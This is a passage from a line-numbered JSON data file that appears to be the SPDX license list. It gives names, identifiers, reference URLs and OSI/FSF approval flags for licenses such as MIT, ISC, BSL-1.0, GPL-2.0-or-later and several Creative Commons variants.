4005 ],
4006 "isOsiApproved": false,
4007 "isFsfLibre": true
4008 },
4009 {
4010 "reference": "https://spdx.org/licenses/AGPL-1.0-or-later.html",
4011 "isDeprecatedLicenseId": false,
4012 "detailsUrl": "https://spdx.org/licenses/AGPL-1.0-or-later.json",
4013 "referenceNumber": 322,
4014 "name": "Affero General Public License v1.0 or later",
4015 "licenseId": "AGPL-1.0-or-later",
4016 "seeAlso": [
4017 "http://www.affero.org/oagpl.html"
4018 ],
4019 "isOsiApproved": false
4020 },
4021 {
4022 "reference": "https://spdx.org/licenses/OFL-1.1-no-RFN.html",
4023 "isDeprecatedLicenseId": false,
4024 "detailsUrl": "https://spdx.org/licenses/OFL-1.1-no-RFN.json",
4025 "referenceNumber": 323,
4026 "name": "SIL Open Font License 1.1 with no Reserved Font Name",
4027 "licenseId": "OFL-1.1-no-RFN",
4028 "seeAlso": [
4029 "http://scripts.sil.org/cms/scripts/page.php?item_id\u003dOFL_web",
4030 "https://opensource.org/licenses/OFL-1.1"
4031 ],
4032 "isOsiApproved": true
4033 },
4034 {
4035 "reference": "https://spdx.org/licenses/BSL-1.0.html",
4036 "isDeprecatedLicenseId": false,
4037 "detailsUrl": "https://spdx.org/licenses/BSL-1.0.json",
4038 "referenceNumber": 324,
4039 "name": "Boost Software License 1.0",
4040 "licenseId": "BSL-1.0",
4041 "seeAlso": [
4042 "http://www.boost.org/LICENSE_1_0.txt",
4043 "https://opensource.org/licenses/BSL-1.0"
4044 ],
4045 "isOsiApproved": true,
4046 "isFsfLibre": true
4047 },
4048 {
4049 "reference": "https://spdx.org/licenses/Libpng.html",
4050 "isDeprecatedLicenseId": false,
4051 "detailsUrl": "https://spdx.org/licenses/Libpng.json",
4052 "referenceNumber": 325,
4053 "name": "libpng License",
4054 "licenseId": "Libpng",
4055 "seeAlso": [
4056 "http://www.libpng.org/pub/png/src/libpng-LICENSE.txt"
4057 ],
4058 "isOsiApproved": false
4059 },
4060 {
4061 "reference": "https://spdx.org/licenses/CC-BY-NC-3.0.html",
4062 "isDeprecatedLicenseId": false,
4063 "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-3.0.json",
4064 "referenceNumber": 326,
4065 "name": "Creative Commons Attribution Non Commercial 3.0 Unported",
4066 "licenseId": "CC-BY-NC-3.0",
4067 "seeAlso": [
4068 "https://creativecommons.org/licenses/by-nc/3.0/legalcode"
4069 ],
4070 "isOsiApproved": false
4071 },
4072 {
4073 "reference": "https://spdx.org/licenses/CC-BY-NC-2.0.html",
4074 "isDeprecatedLicenseId": false,
4075 "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-2.0.json",
4076 "referenceNumber": 327,
4077 "name": "Creative Commons Attribution Non Commercial 2.0 Generic",
4078 "licenseId": "CC-BY-NC-2.0",
4079 "seeAlso": [
4080 "https://creativecommons.org/licenses/by-nc/2.0/legalcode"
4081 ],
4082 "isOsiApproved": false
4083 },
4084 {
4085 "reference": "https://spdx.org/licenses/Unlicense.html",
4086 "isDeprecatedLicenseId": false,
4087 "detailsUrl": "https://spdx.org/licenses/Unlicense.json",
4088 "referenceNumber": 328,
4089 "name": "The Unlicense",
4090 "licenseId": "Unlicense",
4091 "seeAlso": [
4092 "https://unlicense.org/"
4093 ],
4094 "isOsiApproved": true,
4095 "isFsfLibre": true
4096 },
4097 {
4098 "reference": "https://spdx.org/licenses/LPL-1.0.html",
4099 "isDeprecatedLicenseId": false,
4100 "detailsUrl": "https://spdx.org/licenses/LPL-1.0.json",
4101 "referenceNumber": 329,
4102 "name": "Lucent Public License Version 1.0",
4103 "licenseId": "LPL-1.0",
4104 "seeAlso": [
4105 "https://opensource.org/licenses/LPL-1.0"
4106 ],
4107 "isOsiApproved": true
4108 },
4109 {
4110 "reference": "https://spdx.org/licenses/bzip2-1.0.5.html",
4111 "isDeprecatedLicenseId": false,
4112 "detailsUrl": "https://spdx.org/licenses/bzip2-1.0.5.json",
4113 "referenceNumber": 330,
4114 "name": "bzip2 and libbzip2 License v1.0.5",
4115 "licenseId": "bzip2-1.0.5",
4116 "seeAlso": [
4117 "https://sourceware.org/bzip2/1.0.5/bzip2-manual-1.0.5.html",
4118 "http://bzip.org/1.0.5/bzip2-manual-1.0.5.html"
4119 ],
4120 "isOsiApproved": false
4121 },
4122 {
4123 "reference": "https://spdx.org/licenses/Entessa.html",
4124 "isDeprecatedLicenseId": false,
4125 "detailsUrl": "https://spdx.org/licenses/Entessa.json",
4126 "referenceNumber": 331,
4127 "name": "Entessa Public License v1.0",
4128 "licenseId": "Entessa",
4129 "seeAlso": [
4130 "https://opensource.org/licenses/Entessa"
4131 ],
4132 "isOsiApproved": true
4133 },
4134 {
4135 "reference": "https://spdx.org/licenses/BSD-2-Clause-Patent.html",
4136 "isDeprecatedLicenseId": false,
4137 "detailsUrl": "https://spdx.org/licenses/BSD-2-Clause-Patent.json",
4138 "referenceNumber": 332,
4139 "name": "BSD-2-Clause Plus Patent License",
4140 "licenseId": "BSD-2-Clause-Patent",
4141 "seeAlso": [
4142 "https://opensource.org/licenses/BSDplusPatent"
4143 ],
4144 "isOsiApproved": true
4145 },
4146 {
4147 "reference": "https://spdx.org/licenses/ECL-2.0.html",
4148 "isDeprecatedLicenseId": false,
4149 "detailsUrl": "https://spdx.org/licenses/ECL-2.0.json",
4150 "referenceNumber": 333,
4151 "name": "Educational Community License v2.0",
4152 "licenseId": "ECL-2.0",
4153 "seeAlso": [
4154 "https://opensource.org/licenses/ECL-2.0"
4155 ],
4156 "isOsiApproved": true,
4157 "isFsfLibre": true
4158 },
4159 {
4160 "reference": "https://spdx.org/licenses/Crossword.html",
4161 "isDeprecatedLicenseId": false,
4162 "detailsUrl": "https://spdx.org/licenses/Crossword.json",
4163 "referenceNumber": 334,
4164 "name": "Crossword License",
4165 "licenseId": "Crossword",
4166 "seeAlso": [
4167 "https://fedoraproject.org/wiki/Licensing/Crossword"
4168 ],
4169 "isOsiApproved": false
4170 },
4171 {
4172 "reference": "https://spdx.org/licenses/CC-BY-NC-ND-1.0.html",
4173 "isDeprecatedLicenseId": false,
4174 "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-ND-1.0.json",
4175 "referenceNumber": 335,
4176 "name": "Creative Commons Attribution Non Commercial No Derivatives 1.0 Generic",
4177 "licenseId": "CC-BY-NC-ND-1.0",
4178 "seeAlso": [
4179 "https://creativecommons.org/licenses/by-nd-nc/1.0/legalcode"
4180 ],
4181 "isOsiApproved": false
4182 },
4183 {
4184 "reference": "https://spdx.org/licenses/OCLC-2.0.html",
4185 "isDeprecatedLicenseId": false,
4186 "detailsUrl": "https://spdx.org/licenses/OCLC-2.0.json",
4187 "referenceNumber": 336,
4188 "name": "OCLC Research Public License 2.0",
4189 "licenseId": "OCLC-2.0",
4190 "seeAlso": [
4191 "http://www.oclc.org/research/activities/software/license/v2final.htm",
4192 "https://opensource.org/licenses/OCLC-2.0"
4193 ],
4194 "isOsiApproved": true
4195 },
4196 {
4197 "reference": "https://spdx.org/licenses/CECILL-1.1.html",
4198 "isDeprecatedLicenseId": false,
4199 "detailsUrl": "https://spdx.org/licenses/CECILL-1.1.json",
4200 "referenceNumber": 337,
4201 "name": "CeCILL Free Software License Agreement v1.1",
4202 "licenseId": "CECILL-1.1",
4203 "seeAlso": [
4204 "http://www.cecill.info/licences/Licence_CeCILL_V1.1-US.html"
4205 ],
4206 "isOsiApproved": false
4207 },
4208 {
4209 "reference": "https://spdx.org/licenses/CECILL-2.1.html",
4210 "isDeprecatedLicenseId": false,
4211 "detailsUrl": "https://spdx.org/licenses/CECILL-2.1.json",
4212 "referenceNumber": 338,
4213 "name": "CeCILL Free Software License Agreement v2.1",
4214 "licenseId": "CECILL-2.1",
4215 "seeAlso": [
4216 "http://www.cecill.info/licences/Licence_CeCILL_V2.1-en.html"
4217 ],
4218 "isOsiApproved": true
4219 },
4220 {
4221 "reference": "https://spdx.org/licenses/OGDL-Taiwan-1.0.html",
4222 "isDeprecatedLicenseId": false,
4223 "detailsUrl": "https://spdx.org/licenses/OGDL-Taiwan-1.0.json",
4224 "referenceNumber": 339,
4225 "name": "Taiwan Open Government Data License, version 1.0",
4226 "licenseId": "OGDL-Taiwan-1.0",
4227 "seeAlso": [
4228 "https://data.gov.tw/license"
4229 ],
4230 "isOsiApproved": false
4231 },
4232 {
4233 "reference": "https://spdx.org/licenses/Abstyles.html",
4234 "isDeprecatedLicenseId": false,
4235 "detailsUrl": "https://spdx.org/licenses/Abstyles.json",
4236 "referenceNumber": 340,
4237 "name": "Abstyles License",
4238 "licenseId": "Abstyles",
4239 "seeAlso": [
4240 "https://fedoraproject.org/wiki/Licensing/Abstyles"
4241 ],
4242 "isOsiApproved": false
4243 },
4244 {
4245 "reference": "https://spdx.org/licenses/libselinux-1.0.html",
4246 "isDeprecatedLicenseId": false,
4247 "detailsUrl": "https://spdx.org/licenses/libselinux-1.0.json",
4248 "referenceNumber": 341,
4249 "name": "libselinux public domain notice",
4250 "licenseId": "libselinux-1.0",
4251 "seeAlso": [
4252 "https://github.com/SELinuxProject/selinux/blob/master/libselinux/LICENSE"
4253 ],
4254 "isOsiApproved": false
4255 },
4256 {
4257 "reference": "https://spdx.org/licenses/ANTLR-PD.html",
4258 "isDeprecatedLicenseId": false,
4259 "detailsUrl": "https://spdx.org/licenses/ANTLR-PD.json",
4260 "referenceNumber": 342,
4261 "name": "ANTLR Software Rights Notice",
4262 "licenseId": "ANTLR-PD",
4263 "seeAlso": [
4264 "http://www.antlr2.org/license.html"
4265 ],
4266 "isOsiApproved": false
4267 },
4268 {
4269 "reference": "https://spdx.org/licenses/GPL-2.0-or-later.html",
4270 "isDeprecatedLicenseId": false,
4271 "detailsUrl": "https://spdx.org/licenses/GPL-2.0-or-later.json",
4272 "referenceNumber": 343,
4273 "name": "GNU General Public License v2.0 or later",
4274 "licenseId": "GPL-2.0-or-later",
4275 "seeAlso": [
4276 "https://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html",
4277 "https://opensource.org/licenses/GPL-2.0"
4278 ],
4279 "isOsiApproved": true,
4280 "isFsfLibre": true
4281 },
4282 {
4283 "reference": "https://spdx.org/licenses/IPL-1.0.html",
4284 "isDeprecatedLicenseId": false,
4285 "detailsUrl": "https://spdx.org/licenses/IPL-1.0.json",
4286 "referenceNumber": 344,
4287 "name": "IBM Public License v1.0",
4288 "licenseId": "IPL-1.0",
4289 "seeAlso": [
4290 "https://opensource.org/licenses/IPL-1.0"
4291 ],
4292 "isOsiApproved": true,
4293 "isFsfLibre": true
4294 },
4295 {
4296 "reference": "https://spdx.org/licenses/MIT-enna.html",
4297 "isDeprecatedLicenseId": false,
4298 "detailsUrl": "https://spdx.org/licenses/MIT-enna.json",
4299 "referenceNumber": 345,
4300 "name": "enna License",
4301 "licenseId": "MIT-enna",
4302 "seeAlso": [
4303 "https://fedoraproject.org/wiki/Licensing/MIT#enna"
4304 ],
4305 "isOsiApproved": false
4306 },
4307 {
4308 "reference": "https://spdx.org/licenses/CPOL-1.02.html",
4309 "isDeprecatedLicenseId": false,
4310 "detailsUrl": "https://spdx.org/licenses/CPOL-1.02.json",
4311 "referenceNumber": 346,
4312 "name": "Code Project Open License 1.02",
4313 "licenseId": "CPOL-1.02",
4314 "seeAlso": [
4315 "http://www.codeproject.com/info/cpol10.aspx"
4316 ],
4317 "isOsiApproved": false
4318 },
4319 {
4320 "reference": "https://spdx.org/licenses/CC-BY-SA-3.0-AT.html",
4321 "isDeprecatedLicenseId": false,
4322 "detailsUrl": "https://spdx.org/licenses/CC-BY-SA-3.0-AT.json",
4323 "referenceNumber": 347,
4324 "name": "Creative Commons Attribution Share Alike 3.0 Austria",
4325 "licenseId": "CC-BY-SA-3.0-AT",
4326 "seeAlso": [
4327 "https://creativecommons.org/licenses/by-sa/3.0/at/legalcode"
4328 ],
4329 "isOsiApproved": false
4330 },
4331 {
4332 "reference": "https://spdx.org/licenses/GPL-3.0-with-GCC-exception.html",
4333 "isDeprecatedLicenseId": true,
4334 "detailsUrl": "https://spdx.org/licenses/GPL-3.0-with-GCC-exception.json",
4335 "referenceNumber": 348,
4336 "name": "GNU General Public License v3.0 w/GCC Runtime Library exception",
4337 "licenseId": "GPL-3.0-with-GCC-exception",
4338 "seeAlso": [
4339 "https://www.gnu.org/licenses/gcc-exception-3.1.html"
4340 ],
4341 "isOsiApproved": true
4342 },
4343 {
4344 "reference": "https://spdx.org/licenses/BSD-1-Clause.html",
4345 "isDeprecatedLicenseId": false,
4346 "detailsUrl": "https://spdx.org/licenses/BSD-1-Clause.json",
4347 "referenceNumber": 349,
4348 "name": "BSD 1-Clause License",
4349 "licenseId": "BSD-1-Clause",
4350 "seeAlso": [
4351 "https://svnweb.freebsd.org/base/head/include/ifaddrs.h?revision\u003d326823"
4352 ],
4353 "isOsiApproved": true
4354 },
4355 {
4356 "reference": "https://spdx.org/licenses/NTP-0.html",
4357 "isDeprecatedLicenseId": false,
4358 "detailsUrl": "https://spdx.org/licenses/NTP-0.json",
4359 "referenceNumber": 350,
4360 "name": "NTP No Attribution",
4361 "licenseId": "NTP-0",
4362 "seeAlso": [
4363 "https://github.com/tytso/e2fsprogs/blob/master/lib/et/et_name.c"
4364 ],
4365 "isOsiApproved": false
4366 },
4367 {
4368 "reference": "https://spdx.org/licenses/SugarCRM-1.1.3.html",
4369 "isDeprecatedLicenseId": false,
4370 "detailsUrl": "https://spdx.org/licenses/SugarCRM-1.1.3.json",
4371 "referenceNumber": 351,
4372 "name": "SugarCRM Public License v1.1.3",
4373 "licenseId": "SugarCRM-1.1.3",
4374 "seeAlso": [
4375 "http://www.sugarcrm.com/crm/SPL"
4376 ],
4377 "isOsiApproved": false
4378 },
4379 {
4380 "reference": "https://spdx.org/licenses/MIT.html",
4381 "isDeprecatedLicenseId": false,
4382 "detailsUrl": "https://spdx.org/licenses/MIT.json",
4383 "referenceNumber": 352,
4384 "name": "MIT License",
4385 "licenseId": "MIT",
4386 "seeAlso": [
4387 "https://opensource.org/licenses/MIT"
4388 ],
4389 "isOsiApproved": true,
4390 "isFsfLibre": true
4391 },
4392 {
4393 "reference": "https://spdx.org/licenses/OFL-1.1-RFN.html",
4394 "isDeprecatedLicenseId": false,
4395 "detailsUrl": "https://spdx.org/licenses/OFL-1.1-RFN.json",
4396 "referenceNumber": 353,
4397 "name": "SIL Open Font License 1.1 with Reserved Font Name",
4398 "licenseId": "OFL-1.1-RFN",
4399 "seeAlso": [
4400 "http://scripts.sil.org/cms/scripts/page.php?item_id\u003dOFL_web",
4401 "https://opensource.org/licenses/OFL-1.1"
4402 ],
4403 "isOsiApproved": true
4404 },
4405 {
4406 "reference": "https://spdx.org/licenses/Watcom-1.0.html",
4407 "isDeprecatedLicenseId": false,
4408 "detailsUrl": "https://spdx.org/licenses/Watcom-1.0.json",
4409 "referenceNumber": 354,
4410 "name": "Sybase Open Watcom Public License 1.0",
4411 "licenseId": "Watcom-1.0",
4412 "seeAlso": [
4413 "https://opensource.org/licenses/Watcom-1.0"
4414 ],
4415 "isOsiApproved": true
4416 },
4417 {
4418 "reference": "https://spdx.org/licenses/CC-BY-NC-SA-2.0-FR.html",
4419 "isDeprecatedLicenseId": false,
4420 "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-SA-2.0-FR.json",
4421 "referenceNumber": 355,
4422 "name": "Creative Commons Attribution-NonCommercial-ShareAlike 2.0 France",
4423 "licenseId": "CC-BY-NC-SA-2.0-FR",
4424 "seeAlso": [
4425 "https://creativecommons.org/licenses/by-nc-sa/2.0/fr/legalcode"
4426 ],
4427 "isOsiApproved": false
4428 },
4429 {
4430 "reference": "https://spdx.org/licenses/ODbL-1.0.html",
4431 "isDeprecatedLicenseId": false,
4432 "detailsUrl": "https://spdx.org/licenses/ODbL-1.0.json",
4433 "referenceNumber": 356,
4434 "name": "Open Data Commons Open Database License v1.0",
4435 "licenseId": "ODbL-1.0",
4436 "seeAlso": [
4437 "http://www.opendatacommons.org/licenses/odbl/1.0/",
4438 "https://opendatacommons.org/licenses/odbl/1-0/"
4439 ],
4440 "isOsiApproved": false,
4441 "isFsfLibre": true
4442 },
4443 {
4444 "reference": "https://spdx.org/licenses/FSFULLR.html",
4445 "isDeprecatedLicenseId": false,
4446 "detailsUrl": "https://spdx.org/licenses/FSFULLR.json",
4447 "referenceNumber": 357,
4448 "name": "FSF Unlimited License (with License Retention)",
4449 "licenseId": "FSFULLR",
4450 "seeAlso": [
4451 "https://fedoraproject.org/wiki/Licensing/FSF_Unlimited_License#License_Retention_Variant"
4452 ],
4453 "isOsiApproved": false
4454 },
4455 {
4456 "reference": "https://spdx.org/licenses/OLDAP-1.3.html",
4457 "isDeprecatedLicenseId": false,
4458 "detailsUrl": "https://spdx.org/licenses/OLDAP-1.3.json",
4459 "referenceNumber": 358,
4460 "name": "Open LDAP Public License v1.3",
4461 "licenseId": "OLDAP-1.3",
4462 "seeAlso": [
4463 "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003de5f8117f0ce088d0bd7a8e18ddf37eaa40eb09b1"
4464 ],
4465 "isOsiApproved": false
4466 },
4467 {
4468 "reference": "https://spdx.org/licenses/SSH-OpenSSH.html",
4469 "isDeprecatedLicenseId": false,
4470 "detailsUrl": "https://spdx.org/licenses/SSH-OpenSSH.json",
4471 "referenceNumber": 359,
4472 "name": "SSH OpenSSH license",
4473 "licenseId": "SSH-OpenSSH",
4474 "seeAlso": [
4475 "https://github.com/openssh/openssh-portable/blob/1b11ea7c58cd5c59838b5fa574cd456d6047b2d4/LICENCE#L10"
4476 ],
4477 "isOsiApproved": false
4478 },
4479 {
4480 "reference": "https://spdx.org/licenses/BSD-2-Clause.html",
4481 "isDeprecatedLicenseId": false,
4482 "detailsUrl": "https://spdx.org/licenses/BSD-2-Clause.json",
4483 "referenceNumber": 360,
4484 "name": "BSD 2-Clause \"Simplified\" License",
4485 "licenseId": "BSD-2-Clause",
4486 "seeAlso": [
4487 "https://opensource.org/licenses/BSD-2-Clause"
4488 ],
4489 "isOsiApproved": true
4490 },
4491 {
4492 "reference": "https://spdx.org/licenses/HPND.html",
4493 "isDeprecatedLicenseId": false,
4494 "detailsUrl": "https://spdx.org/licenses/HPND.json",
4495 "referenceNumber": 361,
4496 "name": "Historical Permission Notice and Disclaimer",
4497 "licenseId": "HPND",
4498 "seeAlso": [
4499 "https://opensource.org/licenses/HPND"
4500 ],
4501 "isOsiApproved": true,
4502 "isFsfLibre": true
4503 },
4504 {
4505 "reference": "https://spdx.org/licenses/Zimbra-1.3.html",
4506 "isDeprecatedLicenseId": false,
4507 "detailsUrl": "https://spdx.org/licenses/Zimbra-1.3.json",
4508 "referenceNumber": 362,
4509 "name": "Zimbra Public License v1.3",
4510 "licenseId": "Zimbra-1.3",
4511 "seeAlso": [
4512 "http://web.archive.org/web/20100302225219/http://www.zimbra.com/license/zimbra-public-license-1-3.html"
4513 ],
4514 "isOsiApproved": false,
4515 "isFsfLibre": true
4516 },
4517 {
4518 "reference": "https://spdx.org/licenses/Borceux.html",
4519 "isDeprecatedLicenseId": false,
4520 "detailsUrl": "https://spdx.org/licenses/Borceux.json",
4521 "referenceNumber": 363,
4522 "name": "Borceux license",
4523 "licenseId": "Borceux",
4524 "seeAlso": [
4525 "https://fedoraproject.org/wiki/Licensing/Borceux"
4526 ],
4527 "isOsiApproved": false
4528 },
4529 {
4530 "reference": "https://spdx.org/licenses/OLDAP-1.1.html",
4531 "isDeprecatedLicenseId": false,
4532 "detailsUrl": "https://spdx.org/licenses/OLDAP-1.1.json",
4533 "referenceNumber": 364,
4534 "name": "Open LDAP Public License v1.1",
4535 "licenseId": "OLDAP-1.1",
4536 "seeAlso": [
4537 "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003d806557a5ad59804ef3a44d5abfbe91d706b0791f"
4538 ],
4539 "isOsiApproved": false
4540 },
4541 {
4542 "reference": "https://spdx.org/licenses/OFL-1.0.html",
4543 "isDeprecatedLicenseId": false,
4544 "detailsUrl": "https://spdx.org/licenses/OFL-1.0.json",
4545 "referenceNumber": 365,
4546 "name": "SIL Open Font License 1.0",
4547 "licenseId": "OFL-1.0",
4548 "seeAlso": [
4549 "http://scripts.sil.org/cms/scripts/page.php?item_id\u003dOFL10_web"
4550 ],
4551 "isOsiApproved": false
4552 },
4553 {
4554 "reference": "https://spdx.org/licenses/NASA-1.3.html",
4555 "isDeprecatedLicenseId": false,
4556 "detailsUrl": "https://spdx.org/licenses/NASA-1.3.json",
4557 "referenceNumber": 366,
4558 "name": "NASA Open Source Agreement 1.3",
4559 "licenseId": "NASA-1.3",
4560 "seeAlso": [
4561 "http://ti.arc.nasa.gov/opensource/nosa/",
4562 "https://opensource.org/licenses/NASA-1.3"
4563 ],
4564 "isOsiApproved": true
4565 },
4566 {
4567 "reference": "https://spdx.org/licenses/VOSTROM.html",
4568 "isDeprecatedLicenseId": false,
4569 "detailsUrl": "https://spdx.org/licenses/VOSTROM.json",
4570 "referenceNumber": 367,
4571 "name": "VOSTROM Public License for Open Source",
4572 "licenseId": "VOSTROM",
4573 "seeAlso": [
4574 "https://fedoraproject.org/wiki/Licensing/VOSTROM"
4575 ],
4576 "isOsiApproved": false
4577 },
4578 {
4579 "reference": "https://spdx.org/licenses/MIT-0.html",
4580 "isDeprecatedLicenseId": false,
4581 "detailsUrl": "https://spdx.org/licenses/MIT-0.json",
4582 "referenceNumber": 368,
4583 "name": "MIT No Attribution",
4584 "licenseId": "MIT-0",
4585 "seeAlso": [
4586 "https://github.com/aws/mit-0",
4587 "https://romanrm.net/mit-zero",
4588 "https://github.com/awsdocs/aws-cloud9-user-guide/blob/master/LICENSE-SAMPLECODE"
4589 ],
4590 "isOsiApproved": true
4591 },
4592 {
4593 "reference": "https://spdx.org/licenses/ISC.html",
4594 "isDeprecatedLicenseId": false,
4595 "detailsUrl": "https://spdx.org/licenses/ISC.json",
4596 "referenceNumber": 369,
4597 "name": "ISC License",
4598 "licenseId": "ISC",
4599 "seeAlso": [
4600 "https://www.isc.org/licenses/",
4601 "https://www.isc.org/downloads/software-support-policy/isc-license/",
4602 "https://opensource.org/licenses/ISC"
4603 ],
4604 "isOsiApproved": true,
4605 "isFsfLibre": true
4606 },
4607 {
4608 "reference": "https://spdx.org/licenses/Unicode-DFS-2016.html",
4609 "isDeprecatedLicenseId": false,
4610 "detailsUrl": "https://spdx.org/licenses/Unicode-DFS-2016.json",
4611 "referenceNumber": 370,
4612 "name": "Unicode License Agreement - Data Files and Software (2016)",
4613 "licenseId": "Unicode-DFS-2016",
4614 "seeAlso": [
4615 "http://www.unicode.org/copyright.html"
4616 ],
4617 "isOsiApproved": true
4618 },
4619 {
4620 "reference": "https://spdx.org/licenses/BlueOak-1.0.0.html",
4621 "isDeprecatedLicenseId": false,
4622 "detailsUrl": "https://spdx.org/licenses/BlueOak-1.0.0.json",
4623 "referenceNumber": 371,
4624 "name": "Blue Oak Model License 1.0.0",
4625 "licenseId": "BlueOak-1.0.0",
4626 "seeAlso": [
4627 "https://blueoakcouncil.org/license/1.0.0"
4628 ],
4629 "isOsiApproved": false
4630 },
4631 {
4632 "reference": "https://spdx.org/licenses/LiLiQ-Rplus-1.1.html",
4633 "isDeprecatedLicenseId": false,
4634 "detailsUrl": "https://spdx.org/licenses/LiLiQ-Rplus-1.1.json",
4635 "referenceNumber": 372,
4636 "name": "Licence Libre du Québec – Réciprocité forte version 1.1",
4637 "licenseId": "LiLiQ-Rplus-1.1",
4638 "seeAlso": [
4639 "https://www.forge.gouv.qc.ca/participez/licence-logicielle/licence-libre-du-quebec-liliq-en-francais/licence-libre-du-quebec-reciprocite-forte-liliq-r-v1-1/",
4640 "http://opensource.org/licenses/LiLiQ-Rplus-1.1"
4641 ],
4642 "isOsiApproved": true
4643 },
4644 {
4645 "reference": "https://spdx.org/licenses/NOSL.html",
4646 "isDeprecatedLicenseId": false,
4647 "detailsUrl": "https://spdx.org/licenses/NOSL.json",
4648 "referenceNumber": 373,
4649 "name": "Netizen Open Source License",
4650 "licenseId": "NOSL",
4651 "seeAlso": [
4652 "http://bits.netizen.com.au/licenses/NOSL/nosl.txt"
4653 ],
4654 "isOsiApproved": false,
4655 "isFsfLibre": true
4656 },
4657 {
4658 "reference": "https://spdx.org/licenses/SMLNJ.html",
4659 "isDeprecatedLicenseId": false,
4660 "detailsUrl": "https://spdx.org/licenses/SMLNJ.json",
4661 "referenceNumber": 374,
4662 "name": "Standard ML of New Jersey License",
4663 "licenseId": "SMLNJ",
4664 "seeAlso": [
4665 "https://www.smlnj.org/license.html"
4666 ],
4667 "isOsiApproved": false,
4668 "isFsfLibre": true
4669 },
4670 {
4671 "reference": "https://spdx.org/licenses/LGPL-3.0+.html",
4672 "isDeprecatedLicenseId": true,
4673 "detailsUrl": "https://spdx.org/licenses/LGPL-3.0+.json",
4674 "referenceNumber": 375,
4675 "name": "GNU Lesser General Public License v3.0 or later",
4676 "licenseId": "LGPL-3.0+",
4677 "seeAlso": [
4678 "https://www.gnu.org/licenses/lgpl-3.0-standalone.html",
4679 "https://opensource.org/licenses/LGPL-3.0"
4680 ],
4681 "isOsiApproved": true
4682 },
4683 {
4684 "reference": "https://spdx.org/licenses/CPAL-1.0.html",
4685 "isDeprecatedLicenseId": false,
4686 "detailsUrl": "https://spdx.org/licenses/CPAL-1.0.json",
4687 "referenceNumber": 376,
4688 "name": "Common Public Attribution License 1.0",
4689 "licenseId": "CPAL-1.0",
4690 "seeAlso": [
4691 "https://opensource.org/licenses/CPAL-1.0"
4692 ],
4693 "isOsiApproved": true,
4694 "isFsfLibre": true
4695 },
4696 {
4697 "reference": "https://spdx.org/licenses/PSF-2.0.html",
4698 "isDeprecatedLicenseId": false,
4699 "detailsUrl": "https://spdx.org/licenses/PSF-2.0.json",
4700 "referenceNumber": 377,
4701 "name": "Python Software Foundation License 2.0",
4702 "licenseId": "PSF-2.0",
4703 "seeAlso": [
4704 "https://opensource.org/licenses/Python-2.0"
4705 ],
4706 "isOsiApproved": false
4707 },
4708 {
4709 "reference": "https://spdx.org/licenses/RPL-1.5.html",
4710 "isDeprecatedLicenseId": false,
4711 "detailsUrl": "https://spdx.org/licenses/RPL-1.5.json",
4712 "referenceNumber": 378,
4713 "name": "Reciprocal Public License 1.5",
4714 "licenseId": "RPL-1.5",
4715 "seeAlso": [
4716 "https://opensource.org/licenses/RPL-1.5"
4717 ],
4718 "isOsiApproved": true
4719 },
4720 {
4721 "reference": "https://spdx.org/licenses/BSD-2-Clause-FreeBSD.html",
4722 "isDeprecatedLicenseId": true,
4723 "detailsUrl": "https://spdx.org/licenses/BSD-2-Clause-FreeBSD.json",
4724 "referenceNumber": 379,
4725 "name": "BSD 2-Clause FreeBSD License",
4726 "licenseId": "BSD-2-Clause-FreeBSD",
4727 "seeAlso": [
4728 "http://www.freebsd.org/copyright/freebsd-license.html"
4729 ],
4730 "isOsiApproved": false,
4731 "isFsfLibre": true
4732 },
4733 {
4734 "reference": "https://spdx.org/licenses/MIT-Modern-Variant.html",
4735 "isDeprecatedLicenseId": false,
4736 "detailsUrl": "https://spdx.org/licenses/MIT-Modern-Variant.json",
4737 "referenceNumber": 380,
4738 "name": "MIT License Modern Variant",
4739 "licenseId": "MIT-Modern-Variant",
4740 "seeAlso": [
4741 "https://fedoraproject.org/wiki/Licensing:MIT#Modern_Variants",
4742 "https://ptolemy.berkeley.edu/copyright.htm",
4743 "https://pirlwww.lpl.arizona.edu/resources/guide/software/PerlTk/Tixlic.html"
4744 ],
4745 "isOsiApproved": true
4746 },
4747 {
4748 "reference": "https://spdx.org/licenses/Nokia.html",
4749 "isDeprecatedLicenseId": false,
4750 "detailsUrl": "https://spdx.org/licenses/Nokia.json",
4751 "referenceNumber": 381,
4752 "name": "Nokia Open Source License",
4753 "licenseId": "Nokia",
4754 "seeAlso": [
4755 "https://opensource.org/licenses/nokia"
4756 ],
4757 "isOsiApproved": true,
4758 "isFsfLibre": true
4759 },
4760 {
4761 "reference": "https://spdx.org/licenses/GFDL-1.1-no-invariants-only.html",
4762 "isDeprecatedLicenseId": false,
4763 "detailsUrl": "https://spdx.org/licenses/GFDL-1.1-no-invariants-only.json",
4764 "referenceNumber": 382,
4765 "name": "GNU Free Documentation License v1.1 only - no invariants",
4766 "licenseId": "GFDL-1.1-no-invariants-only",
4767 "seeAlso": [
4768 "https://www.gnu.org/licenses/old-licenses/fdl-1.1.txt"
4769 ],
4770 "isOsiApproved": false
4771 },
4772 {
4773 "reference": "https://spdx.org/licenses/PDDL-1.0.html",
4774 "isDeprecatedLicenseId": false,
4775 "detailsUrl": "https://spdx.org/licenses/PDDL-1.0.json",
4776 "referenceNumber": 383,
4777 "name": "Open Data Commons Public Domain Dedication \u0026 License 1.0",
4778 "licenseId": "PDDL-1.0",
4779 "seeAlso": [
4780 "http://opendatacommons.org/licenses/pddl/1.0/",
4781 "https://opendatacommons.org/licenses/pddl/"
4782 ],
4783 "isOsiApproved": false
4784 },
4785 {
4786 "reference": "https://spdx.org/licenses/EUPL-1.0.html",
4787 "isDeprecatedLicenseId": false,
4788 "detailsUrl": "https://spdx.org/licenses/EUPL-1.0.json",
4789 "referenceNumber": 384,
4790 "name": "European Union Public License 1.0",
4791 "licenseId": "EUPL-1.0",
4792 "seeAlso": [
4793 "http://ec.europa.eu/idabc/en/document/7330.html",
4794 "http://ec.europa.eu/idabc/servlets/Doc027f.pdf?id\u003d31096"
4795 ],
4796 "isOsiApproved": false
4797 },
4798 {
4799 "reference": "https://spdx.org/licenses/CDDL-1.1.html",
4800 "isDeprecatedLicenseId": false,
